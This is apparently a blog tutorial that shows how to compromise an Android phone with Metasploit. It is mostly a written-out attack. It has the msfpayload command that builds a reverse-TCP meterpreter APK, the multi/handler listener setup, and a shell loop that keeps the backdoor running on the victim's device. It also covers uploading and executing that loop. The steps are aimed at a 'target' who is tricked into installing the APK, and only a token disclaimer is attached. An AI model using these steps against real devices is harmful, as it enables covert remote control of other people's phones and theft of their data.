Metasploit is one of the most powerful pentesting and exploitation tools out there,  and in this tutorial,  I’ll show you how to use it to create an access backdoor on any android phone and gain control over it.

DISCLAIMER: All the information in this article is intended for educational purposes only. I am not responsible for any misuse. 

Step 0: Fire up Metasploit

If you’re using Kali Linux/BackBox/BackTrack, metasploit comes pre-installed with the system. Otherwise,  you can download it from:

To start it,  go to your terminal and type:


Wait for sometime,  and the metasploit CUI will start.

Step 1: Create your payload

Open a new terminal and type:

msfpayload android/meterpreter/reverse_tcp LHOST=<your public ip address> R > /root/<name>.apk

This will create the actual exploit apk in your root folder.

Step 2: Set up the handler

Now go to the first terminal we opened. The msfconsole should still be open. Type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST <your internal ip>


A listener should open. Now just keep this listener open and send the apk to your target device. Wait for them to install and voila! You have a backdoor. Now let’s make it persistent!

Step 3: The persistence script.

Go to your root folder and create a new text file.

Write (Don’t copy!) the following lines in it:

while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20

Save it as <name>.sh.  sh is important.

Step 4: Upload it!

Go to your exploit meterpreter shell and type:

cd /

cd /sdcard/Download

Check if you are in the correct directory by typing:


You should be in /storage/emulated/legacy/Download

Now upload the script:

upload <name>.sh

Step 5: Execute!



Now,  go to the place where you uploaded the script:

cd /

cd /sdcard/Download

Now,  type:

sh <name>.sh

Now press ctrl+c to exit shell.

Step 6: Testing!

Close the msfconsole terminal. Open a new terminal and redo Step 2. This time,  your terminal will instantly enter the meterpreter shell.


Note: The back door persistence will be disabled if the phone reboots